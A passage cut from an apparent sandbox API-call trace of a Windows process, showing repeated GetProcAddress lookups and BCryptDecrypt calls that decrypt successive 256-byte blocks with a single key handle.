pbIV=0x0, cbIV=0x0, pbOutput=0x205044b, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205044b, pcbResult=0x14f8fc) returned 0x0 [0175.746] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0175.746] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e8ccd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2050540, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2050540, pcbResult=0x14f8fc) returned 0x0 [0175.748] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0175.748] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e8cdd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2050635, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2050635, pcbResult=0x14f8fc) returned 0x0 [0175.750] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0175.750] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e8ced0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205072a, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205072a, pcbResult=0x14f8fc) returned 0x0 [0175.752] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0175.752] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e8cfd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205081f, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205081f, pcbResult=0x14f8fc) returned 0x0 [0175.753] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0175.753] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e8d0d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2050914, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2050914, pcbResult=0x14f8fc) returned 0x0 [0175.754] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0175.754] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e8d1d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2050a09, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2050a09, pcbResult=0x14f8fc) returned 0x0 [0175.756] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0175.756] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e8d2d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2050afe, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2050afe, pcbResult=0x14f8fc) returned 0x0 [0175.757] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0175.757] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e8d3d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2050bf3, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2050bf3, pcbResult=0x14f8fc) returned 0x0 [0175.758] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0175.758] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e8d4d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2050ce8, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2050ce8, pcbResult=0x14f8fc) returned 0x0 [0175.945] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0175.945] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e8d5d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2050ddd, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2050ddd, pcbResult=0x14f8fc) returned 0x0 [0175.947] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0175.948] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e8d6d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2050ed2, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2050ed2, pcbResult=0x14f8fc) returned 0x0 [0175.950] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0175.950] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e8d7d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2050fc7, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2050fc7, pcbResult=0x14f8fc) returned 0x0 [0175.953] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0175.953] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e8d8d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20510bc, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20510bc, pcbResult=0x14f8fc) returned 0x0 [0175.955] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0175.955] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e8d9d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20511b1, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20511b1, pcbResult=0x14f8fc) returned 0x0 [0175.957] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0175.957] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e8dad0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20512a6, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20512a6, pcbResult=0x14f8fc) returned 0x0 [0175.960] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0175.960] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e8dbd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205139b, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205139b, pcbResult=0x14f8fc) returned 0x0 [0175.963] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0175.963] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e8dcd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2051490, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2051490, pcbResult=0x14f8fc) returned 0x0 [0175.965] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0175.965] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e8ddd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2051585, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2051585, pcbResult=0x14f8fc) returned 0x0 [0175.968] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0175.968] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e8ded0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205167a, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205167a, pcbResult=0x14f8fc) returned 0x0 [0175.970] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0175.970] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e8dfd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205176f, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205176f, pcbResult=0x14f8fc) returned 0x0 [0175.973] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0175.973] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e8e0d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2051864, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2051864, pcbResult=0x14f8fc) returned 0x0 [0175.975] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0175.975] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e8e1d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2051959, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2051959, pcbResult=0x14f8fc) returned 0x0 [0175.978] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0175.978] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e8e2d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2051a4e, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2051a4e, pcbResult=0x14f8fc) returned 0x0 [0176.126] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0176.126] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e8e3d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2051b43, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2051b43, pcbResult=0x14f8fc) returned 0x0 [0176.127] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0176.127] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e8e4d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2051c38, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2051c38, pcbResult=0x14f8fc) returned 0x0 [0176.128] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0176.128] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e8e5d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2051d2d, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2051d2d, pcbResult=0x14f8fc) returned 0x0 [0176.130] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0176.130] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e8e6d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2051e22, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2051e22, pcbResult=0x14f8fc) returned 0x0 [0176.131] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0176.131] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e8e7d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2051f17, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2051f17, pcbResult=0x14f8fc) returned 0x0 [0176.133] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0176.133] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e8e8d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205200c, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205200c, pcbResult=0x14f8fc) returned 0x0 [0176.134] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0176.135] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e8e9d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2052101, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2052101, pcbResult=0x14f8fc) returned 0x0 [0176.136] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0176.136] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e8ead0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20521f6, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20521f6, pcbResult=0x14f8fc) returned 0x0 [0176.137] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0176.137] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e8ebd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20522eb, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20522eb, pcbResult=0x14f8fc) returned 0x0 [0176.138] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0176.139] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e8ecd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20523e0, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20523e0, pcbResult=0x14f8fc) returned 0x0 [0176.140] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0176.140] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e8edd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20524d5, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20524d5, pcbResult=0x14f8fc) returned 0x0 [0176.142] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0176.142] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e8eed0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20525ca, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20525ca, pcbResult=0x14f8fc) returned 0x0 [0176.143] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0176.143] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e8efd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20526bf, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20526bf, pcbResult=0x14f8fc) returned 0x0 [0176.145] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0176.145] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e8f0d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20527b4, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20527b4, pcbResult=0x14f8fc) returned 0x0 [0176.146] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0176.146] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e8f1d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20528a9, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20528a9, pcbResult=0x14f8fc) returned 0x0 [0176.147] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0176.147] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e8f2d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205299e, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205299e, pcbResult=0x14f8fc) returned 0x0 [0176.149] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0176.149] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e8f3d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2052a93, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2052a93, pcbResult=0x14f8fc) returned 0x0 [0176.150] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0176.150] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e8f4d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2052b88, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2052b88, pcbResult=0x14f8fc) returned 0x0 [0176.151] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0176.151] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e8f5d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2052c7d, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2052c7d, pcbResult=0x14f8fc) returned 0x0 [0176.153] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0176.153] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e8f6d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2052d72, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2052d72, pcbResult=0x14f8fc) returned 0x0 [0176.154] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0176.155] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e8f7d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2052e67, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2052e67, pcbResult=0x14f8fc) returned 0x0 [0176.156] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0176.156] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e8f8d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2052f5c, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2052f5c, pcbResult=0x14f8fc) returned 0x0 [0176.157] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0176.158] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e8f9d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2053051, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2053051, pcbResult=0x14f8fc) returned 0x0 [0176.159] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0176.159] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e8fad0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2053146, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2053146, pcbResult=0x14f8fc) returned 0x0 [0176.307] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0176.307] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e8fbd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205323b, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205323b, pcbResult=0x14f8fc) returned 0x0 [0176.309] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0176.309] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e8fcd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2053330, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2053330, pcbResult=0x14f8fc) returned 0x0 [0176.310] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0176.310] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e8fdd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2053425, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2053425, pcbResult=0x14f8fc) returned 0x0 [0176.311] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0176.311] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e8fed0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205351a, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205351a, pcbResult=0x14f8fc) returned 0x0 [0176.313] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0176.313] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e8ffd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205360f, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205360f, pcbResult=0x14f8fc) returned 0x0 [0176.314] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0176.314] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e900d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2053704, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2053704, pcbResult=0x14f8fc) returned 0x0 [0176.316] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0176.316] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e901d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20537f9, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20537f9, pcbResult=0x14f8fc) returned 0x0 [0176.318] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0176.318] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e902d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20538ee, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20538ee, pcbResult=0x14f8fc) returned 0x0 [0176.319] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0176.319] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e903d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x20539e3, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x20539e3, pcbResult=0x14f8fc) returned 0x0 [0176.320] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0176.320] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e904d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2053ad8, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2053ad8, pcbResult=0x14f8fc) returned 0x0 [0176.322] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0176.322] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e905d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2053bcd, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x2053bcd, pcbResult=0x14f8fc) returned 0x0 [0176.323] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0176.323] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e906d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2053cc2, cbOutput=0xf5, pcbResult=0x14f8fc, 